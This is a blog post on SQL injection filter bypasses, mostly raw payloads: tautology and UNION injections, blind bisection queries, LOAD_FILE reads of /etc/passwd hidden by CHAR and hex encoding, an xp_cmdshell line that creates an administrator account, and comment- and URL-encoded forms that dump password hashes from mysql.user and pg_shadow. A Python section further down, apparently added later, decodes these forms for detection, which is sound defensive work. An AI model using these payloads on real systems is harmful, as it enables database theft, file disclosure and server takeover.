Saturday, June 16, 2012
Advanced SQL Injection Bypass Techniques
Example:
Code:
"SELECT name, surname FROM users WHERE name='" . $_GET['name'] . "'"
Code:
SELECT name, surname FROM users WHERE name='foobar\' OR 10>4--'
Code:
SELECT name, surname FROM users WHERE name='foobar\' UNION ALL SELECT NAME, PASSWORD FROM SYS.USER$--'
Code:
SELECT name, surname FROM users WHERE name='foobar\' OR ASCII(SUBSTR((SQL query), Nth SQL query output char, 1)) > Bisection algorithm number--'
Code:
LOAD_FILE('/etc/passwd')
Code:
LOAD_FILE(CHAR(47,101,116,99,47,112,97,115,115,119,100))
Code:
LOAD_FILE(0x2f6574632f706173737764)
e.g.:
Code:
SELECT pg_sleep(3)
Code:
S%ELEC%T %p%g_sle%ep(%3)
e.g.:
Code:
exec master..xp_cmdshell 'NET USER myuser mypass /ADD & NET LOCALGROUP Administrators myuser /ADD'
Code:
DECLARE @rand varchar(8000) SET @rand = 0x65786563206d61737465722e2e78705f636d647368656c6c20274e45542055534552206d7975736572206d7970617373202f4144442026204e4554204c4f43414c47524f55502041646d696e6973747261746f7273206d7975736572202f41444427; EXEC (@rand)
e.g.:
Code:
SELECT user, password FROM mysql.user
Code:
SELECT/*R_aNd*/user/*rA.Nd*/,/*Ran|D */password/*r+anD*/FROM/*rAn,D*/mysql.user
e.g.: for the PostgreSQL DBMS
Code:
SELECT schemaname FROM pg_tables
Code:
%53E%4c%45%43T%20%73%63h%65%6d%61%6ea%6de%20%46%52O%4d%20%70g%5f%74a%62%6ce%73
e.g.:
Code:
SELECT user, password FROM mysql.user
Code:
SELECT GROUP_CONCAT(CONCAT(user, 'RaND', password)) FROM mysql.user
Code:
unhex(hex(username))
Bypass for cases where the number of columns is limited
e.g.: for
Code:
SELECT usename, passwd FROM pg_shadow
Code:
UNION ALL SELECT, CHR(109)||CHR(107)||CHR(100)||CHR(83)||CHR(68)||CHR(111)||COALESCE(CAST(usename AS CHARACTER(10000)), CHR(32))||CHR(80)||CHR(121)||CHR(80)||CHR(121)||CHR(66)||CHR(109)||COALESCE(CAST(passwd AS CHARACTER(10000)), CHR(32))||CHR(104)||CHR(108)||CHR(74)||CHR(103)||CHR(107)||CHR(90), FROM pg_shadow--
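Seen from the defending side, every form above is a layer a filter has to undo before keyword matching can work. The Python below is an added example, not code from the original post: it normalises the layers listed on this page (URL-encoding, stray percent signs, inline comments, hex and CHAR()/CHR() literals) and then runs a few signatures over the result. The signature names are made up for this illustration, and the sample inputs are the page's own forms.

```python
import re
from urllib.parse import unquote

# Patterns for the obfuscation layers listed on this page.
INLINE_COMMENT = re.compile(r"/\*.*?\*/", re.S)                    # SELECT/*x*/user
STRAY_PERCENT = re.compile(r"%(?![0-9a-fA-F]{2})")                 # S%ELEC%T (after URL-decoding)
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-fA-F]{2})+)\b")           # 0x2f6574632f706173737764
CHAR_CALL = re.compile(r"\bCHA?R\(\s*(\d+(?:\s*,\s*\d+)*)\s*\)", re.I)  # CHAR(47,...) / CHR(109)
STRING_CONCAT = re.compile(r"'\s*\|\|\s*'")                        # 'a'||'b' -> 'ab'

# Signature names are hypothetical; the patterns match the normalised text only.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b.*\bselect\b"),
    "tautology": re.compile(r"\bor\b\s*\d+\s*[<>=]+\s*\d+"),
    "time_delay": re.compile(r"\bpg_sleep\s*\("),
    "file_read": re.compile(r"\bload_file\s*\(|/etc/passwd"),
    "os_command": re.compile(r"\bxp_cmdshell\b"),
    "credential_table": re.compile(r"\bmysql\.user\b|\bpg_shadow\b|\bsys\.user\$"),
}


def normalize(payload: str) -> str:
    """Undo the encodings shown above so the signatures see plain SQL."""
    s = unquote(payload)                      # %53E%4c%45%43T -> SELECT
    s = STRAY_PERCENT.sub("", s)              # leftover S%ELEC%T -> SELECT
    s = INLINE_COMMENT.sub(" ", s)            # a comment acts as a separator
    s = HEX_LITERAL.sub(lambda m: "'" + bytes.fromhex(m.group(1)).decode("latin-1") + "'", s)
    s = CHAR_CALL.sub(lambda m: "'" + "".join(chr(int(n)) for n in m.group(1).split(",")) + "'", s)
    s = STRING_CONCAT.sub("", s)              # join 'a'||'b' pieces back into one literal
    return re.sub(r"\s+", " ", s).strip().lower()


def classify(payload: str, normalise: bool = True) -> list[str]:
    """Names of the signatures that match. normalise=False shows what a naive
    keyword filter sees on the raw input."""
    text = normalize(payload) if normalise else payload.lower()
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]


if __name__ == "__main__":
    # Constructed sample inputs, copied from the forms listed on this page.
    for p in ("S%ELEC%T %p%g_sle%ep(%3)",
              "LOAD_FILE(0x2f6574632f706173737764)",
              "SELECT/*R_aNd*/user/*rA.Nd*/,/*Ran|D */password/*r+anD*/FROM/*rAn,D*/mysql.user"):
        print(f"{p!r}\n  raw: {classify(p, normalise=False)}  normalised: {classify(p)}")
```

The percent-split and URL-encoded forms match nothing until they are decoded, which is the point: a filter that inspects the raw request string misses them entirely.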
Good luck.
Category: SQL Injection